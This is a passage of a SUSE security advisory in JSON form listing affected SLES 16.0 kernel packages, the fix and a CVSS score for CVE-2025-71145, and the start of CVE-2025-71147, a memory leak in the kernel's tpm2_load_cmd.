"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
